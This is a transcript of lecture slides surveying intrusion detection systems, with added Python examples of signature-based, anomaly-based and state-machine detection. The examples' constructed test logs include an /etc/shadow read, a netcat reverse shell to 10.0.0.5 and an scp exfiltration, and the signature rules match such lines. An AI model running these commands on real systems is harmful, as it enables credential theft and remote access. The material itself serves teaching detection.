Survey of Intrusion Detection Systems - PowerPoint PPT Presentation

Slides: 10
Provided by: willi300
Learn more at: http://www.cs.ucf.edu

Transcript and Presenter's Notes

1
Survey of Intrusion Detection Systems
2
Motivation
  • The worldwide impact of malicious code attacks is
    estimated to be over $10 billion annually.
  • The CERT center at CMU reported 73,359 security
    incidents between 1/1/02 and 9/30/02, equal to
    all of the security incidents reported in
    2000-2001 combined.
  • Novice attackers can easily acquire and use
    automated denial-of-service attack software.
  • Human security analysts can't keep up with it all

3
Intrusion Detection
  • Attempts to detect unauthorized or malicious
    activities in a network or on a host system
  • Signature-based - looks for patterns that are
    known to be intrusive in packets or audit logs
  • Anomaly-based - looks for 'abnormal' activity,
    usually requires a template of 'normal' activity
  • Determining 'who' is much harder than just
    detecting that an intrusion occurred.
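The two detection styles on this slide behave differently on the same data. The following added example (written for this page, not code from the presentation) runs a Snort-style signature matcher and a frequency-profile anomaly detector over constructed audit-log lines of the form "time user command args". The training lines are assumed attack-free; the signature rules are hypothetical and written for the sample data only.

```python
import re
from collections import Counter

# Constructed audit-log lines for this example (not from the page): "time user command args".
# The training set is assumed to be attack-free, which is what a profile of 'normal' requires.
TRAINING_LOG = [
    "08:55 alice login -",
    "08:57 alice ls /home/alice",
    "08:58 alice vi report.txt",
    "09:10 alice ls /home/alice/src",
    "09:12 alice vi main.c",
    "09:15 alice gcc main.c",
    "09:16 alice vi main.c",
    "09:30 alice ls /home/alice",
    "09:31 alice vi report.txt",
    "10:00 alice mail bob",
    "10:05 alice ls /tmp",
    "10:06 alice vi notes.txt",
]

# Constructed test lines: two normal commands, one benign-but-new tool (gdb),
# two attacks with known signatures, and one novel exfiltration with no signature.
TEST_LOG = [
    "09:02 alice ls /home/alice",
    "09:03 alice vi report.txt",
    "09:20 alice gdb a.out",
    "23:40 alice cat /etc/shadow",
    "23:41 alice nc -e /bin/sh 10.0.0.5 4444",
    "23:45 alice scp report.txt 10.0.0.5:/tmp",
]

# Hypothetical signature rules: a name plus a pattern known to be intrusive.
SIGNATURES = [
    ("shadow-file-read", re.compile(r"\b(cat|cp|less)\b.*/etc/shadow\b")),
    ("reverse-shell", re.compile(r"\bnc\b.*-e\s+/bin/(ba)?sh\b")),
]


def signature_detect(lines):
    """Signature-based: return (line, rule_name) for every line matching a known pattern."""
    hits = []
    for line in lines:
        for name, pattern in SIGNATURES:
            if pattern.search(line):
                hits.append((line, name))
    return hits


def build_profile(lines):
    """Anomaly-based, step 1: the template of 'normal' is the relative frequency
    with which each user ran each command in the attack-free training data."""
    counts = Counter()
    for line in lines:
        _, user, command, *_ = line.split()
        counts[(user, command)] += 1
    total = sum(counts.values())
    return {pair: n / total for pair, n in counts.items()}


def anomaly_detect(lines, profile, threshold=0.05):
    """Anomaly-based, step 2: flag lines whose (user, command) pair is rarer in the
    profile than `threshold`; unseen pairs score 0.0. Returns (line, score)."""
    alerts = []
    for line in lines:
        _, user, command, *_ = line.split()
        score = profile.get((user, command), 0.0)
        if score < threshold:
            alerts.append((line, score))
    return alerts


if __name__ == "__main__":
    for line, rule in signature_detect(TEST_LOG):
        print(f"SIGNATURE {rule:18s} {line}")
    profile = build_profile(TRAINING_LOG)
    for line, score in anomaly_detect(TEST_LOG, profile):
        print(f"ANOMALY   p={score:.3f}            {line}")
```

Run as a script, the signature matcher reports exactly the two lines its rules describe and is silent on the `scp` exfiltration, while the anomaly detector flags the exfiltration along with the two signature hits but also raises a false alarm on the harmless, never-before-seen `gdb`. That is the trade-off in miniature: signatures miss what they have no rule for, and profiles of 'normal' fire on anything new, attack or not.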

4
Early Work on Security
  • Saltzer and Schroeder (1974) - established
    security design principles and mechanisms
  • Orange Book (1985) - DoD specifications (TCSEC)
  • Formal Models - e.g. Bell-LaPadula (1976), which
    supported formal proofs of conformance to
    security policies
  • Denning (1987) - described the requirements for
    designing an intrusion detection system

5
Early Systems
  • IDES - statistical anomaly detection
  • Haystack - also added signature detection
  • Wisdom & Sense (W&S) - automatically created a
    profile of 'normal' behavior from past user and
    host activities
  • ISOA - uses both real-time monitoring and
    post-session analysis to detect suspicious
    behavior, developed profiles at both levels

6
Recent Research in ID
  • NIDES - distributed collection of host data,
    centralized analysis (extension of IDES)
  • NSM - network traffic monitoring for anomalous
    packets
  • DIDS - combines host-based (Haystack) and network
    monitoring (NSM)
  • CSM - peer-to-peer distributed analysis

7
Recent Research (continued)
  • Bro - analyzes packet contents
  • GrIDS - builds graphs of network activity and
    looks for anomalies
  • STAT and NetSTAT - model an attack as a state
    machine over host audit events (STAT) or network
    events (NetSTAT); if the event stream drives the
    machine to an accepting state, the attack occurred
  • EMERALD - framework for building an ID system
    with distributed collection and analysis, modular
    design (extended NIDES)
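The state-machine idea behind STAT is easiest to see with a small matcher. The following is an added example for this page (not STAT's or NetSTAT's own code): a hypothetical three-step scenario, brute-force login attempts from one source, then a successful login from that same source, then a setuid execution by the user of that session, is expressed as ordered transitions that bind variables as they fire, and a stream of constructed events is run through it. The event field names and the scenario are assumptions made for the example.

```python
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

Event = Dict[str, str]
Bindings = Dict[str, str]


@dataclass
class Transition:
    """One arc of the attack state machine. `matches` returns the variable bindings
    the event contributes, or None if this event cannot take the arc."""
    name: str
    matches: Callable[[Event, Bindings], Optional[Bindings]]


# Hypothetical scenario (constructed for this example): arcs must fire in this order,
# and later arcs are constrained by variables bound by earlier ones.
def _failed_login(ev, b):
    if ev["type"] == "auth_fail":
        return {"src": ev["src"]}
    return None

def _login_from_same_src(ev, b):
    if ev["type"] == "auth_success" and ev["src"] == b["src"]:
        return {"user": ev["user"]}
    return None

def _setuid_by_that_user(ev, b):
    if ev["type"] == "setuid_exec" and ev["src"] == b["src"] and ev["user"] == b["user"]:
        return {"binary": ev["path"]}
    return None

BRUTE_FORCE_THEN_ESCALATE = [
    Transition("failed_login", _failed_login),
    Transition("login_from_same_src", _login_from_same_src),
    Transition("setuid_exec_by_that_user", _setuid_by_that_user),
]


def run_stat(scenario: List[Transition], events: List[Event]) -> List[Bindings]:
    """Feed events through the scenario. Each live instance is (index of the next arc,
    bindings). Firing an arc forks a new instance and leaves the old one alive, so a
    later event can also extend it; an instance in the start state is always present.
    Taking the last arc is acceptance: the attack occurred, with these bindings."""
    instances = {(0, frozenset())}   # a set: duplicate forks would give duplicate alerts
    accepted: List[Bindings] = []
    for ev in events:
        for idx, frozen in list(instances):
            bindings = dict(frozen)
            new_bindings = scenario[idx].matches(ev, bindings)
            if new_bindings is None:
                continue
            merged = {**bindings, **new_bindings}
            if idx + 1 == len(scenario):
                accepted.append(merged)
            else:
                instances.add((idx + 1, frozenset(merged.items())))
    return accepted


# Constructed event streams (not from the page). The first interleaves an attack with
# benign activity from another host; the second is benign only.
EVENTS = [
    {"type": "auth_fail", "src": "10.0.0.5", "user": "root"},
    {"type": "auth_fail", "src": "10.0.0.5", "user": "root"},
    {"type": "auth_success", "src": "192.168.1.20", "user": "alice"},
    {"type": "auth_success", "src": "10.0.0.5", "user": "guest"},
    {"type": "setuid_exec", "src": "192.168.1.20", "user": "alice", "path": "/usr/bin/passwd"},
    {"type": "setuid_exec", "src": "10.0.0.5", "user": "guest", "path": "/tmp/exploit"},
]
BENIGN_EVENTS = [
    {"type": "auth_success", "src": "192.168.1.20", "user": "alice"},
    {"type": "setuid_exec", "src": "192.168.1.20", "user": "alice", "path": "/usr/bin/passwd"},
]

if __name__ == "__main__":
    for alert in run_stat(BRUTE_FORCE_THEN_ESCALATE, EVENTS):
        print("ATTACK accepted:", alert)
    print("benign stream:", run_stat(BRUTE_FORCE_THEN_ESCALATE, BENIGN_EVENTS))
```

The variable bindings are what make this more than a regular expression over event types: alice's setuid run of `passwd` does not complete the scenario because it is not from the source that produced the failed logins, and the second failed login does not create a second instance. Two things a deployable matcher would add are not shown here: partial matches should expire (in this toy, a failed login keeps an instance alive forever), and the number of live instances must be bounded, since every fork is kept.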

8
Additional IDS Projects
  • Data-mining for ID - numerous projects mining
    host audit data, captured packets
  • Autonomous Agents - independent agents monitor
    specific activities/resources and report to
    hierarchy of analyzers
  • Open source projects - (e.g. SHADOW and Snort) -
    performance comparable to commercial and research
    systems

9
Major Problems
  • High False-Alarm Rates - real-world tests show
    overwhelming numbers of false alarms, little
    success in filtering them out
  • Availability of Training Data - most
    anomaly-based ID systems need attack-free
    datasets. Currently, no clear way to create or
    certify realistic attack-free data
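Both problems on this slide can be made concrete. The following is an added example for this page (not from the presentation; all numbers and session data are constructed): the first function is the base-rate arithmetic behind "overwhelming numbers of false alarms", and the rest builds a statistical profile of one measure (bytes per session, in the spirit of the statistical profiling IDES used) first from data assumed attack-free and then from the same data with two undetected exfiltration sessions mixed in, which is what happens when training data cannot be certified attack-free.

```python
import statistics


def expected_alerts(events_per_day, attack_fraction, detection_rate, false_alarm_rate):
    """Base-rate arithmetic: with rare attacks, even a small per-event false-alarm
    rate swamps the true alerts. Returns (true_alerts, false_alarms, precision)."""
    attacks = events_per_day * attack_fraction
    benign = events_per_day - attacks
    true_alerts = attacks * detection_rate
    false_alarms = benign * false_alarm_rate
    return true_alerts, false_alarms, true_alerts / (true_alerts + false_alarms)


# Constructed per-session byte counts for one user (not from the page).
# CLEAN_TRAINING is assumed attack-free; CONTAMINATED_TRAINING is the same data with
# two exfiltration sessions that were never noticed and so ended up in the baseline.
CLEAN_TRAINING = [1200, 1500, 1100, 1300, 1400, 1250, 1350, 1150, 1450, 1300]
CONTAMINATED_TRAINING = CLEAN_TRAINING + [250000, 240000]
ATTACK_SESSION = 250000


def statistical_profile(samples):
    """Template of 'normal' for one measure: its mean and population std deviation."""
    return statistics.mean(samples), statistics.pstdev(samples)


def z_score(value, profile):
    mean, std = profile
    return (value - mean) / std


def is_anomalous(value, profile, threshold=3.0):
    """Flag a session whose measure lies more than `threshold` std deviations from normal."""
    return abs(z_score(value, profile)) > threshold


if __name__ == "__main__":
    # 1e6 events/day, 1 in 100,000 malicious, 90% detection, 0.1% false-alarm rate
    true_alerts, false_alarms, precision = expected_alerts(1_000_000, 1e-5, 0.9, 1e-3)
    print(f"true alerts/day {true_alerts:.0f}, false alarms/day {false_alarms:.0f}, "
          f"precision {precision:.1%}")
    clean = statistical_profile(CLEAN_TRAINING)
    dirty = statistical_profile(CONTAMINATED_TRAINING)
    print(f"clean profile: z={z_score(ATTACK_SESSION, clean):.0f}, "
          f"flagged={is_anomalous(ATTACK_SESSION, clean)}")
    print(f"contaminated profile: z={z_score(ATTACK_SESSION, dirty):.2f}, "
          f"flagged={is_anomalous(ATTACK_SESSION, dirty)}")
```

With the clean profile the 250,000-byte session is thousands of standard deviations from normal and is flagged; with just two such sessions in the baseline, the mean and spread widen until the same session scores under the 3-sigma threshold and passes as normal. The base-rate figures make the first bullet precise: at one false alarm per thousand benign events, roughly a thousand false alarms arrive per day against nine true ones, so fewer than one alert in a hundred is real even for a detector that catches 90% of attacks.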